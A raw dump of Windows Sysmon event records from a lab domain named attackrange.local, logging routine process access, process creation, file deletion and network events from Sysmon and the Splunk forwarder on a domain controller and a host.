07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.431{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Program 
Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001048901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2AF8A6DE4616C11BA6B88697233446D,SHA256=CBF7DFA35719B0E6926EB9E261F58802696992B65EEB5848EDCC9C2AFCB427BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:23.960{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C23A19D42E6D97F5B9EB27E101BF3FB,SHA256=4D3CEDA8F9F9A36417B244FEB121E513FC074CF658EFE917A6EC042751367CDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:23.427{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50CFF4EC02B6203CB7198A0A22D4E307,SHA256=9E75E42E23106A254D05E1CB6221696996C713F8BA3C4F19F63D0B0C7104B461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:23.427{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=411555881008278B63B297402CA8B899,SHA256=DA4054BE613CE14EFE76A0B0CF9115BE68111FC57AE402CF5E8AA818A3C75C03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:23.380{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C0B85DAE509F7B48BAA0C59093CCF0,SHA256=3D55285F70A4C7F5A4BABE7B41A38A5D135B997E93C137B5C04D074E0E5829A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:14.605{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51024-false10.0.1.12-8000- 23542300x80000000000000001048928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:24.395{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B33CBBEFFC8AF5E16F2EF6022BB0DE7,SHA256=0325DF87E5C8858BE05F96168502A6693E462E996E39247591334847493EFE35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.819{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.803{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.803{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.804{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.460{0C1E0330-F4B8-60EB-7379-00000000D001}1081900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.303{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4B8-60EB-7379-00000000D001}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.288{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
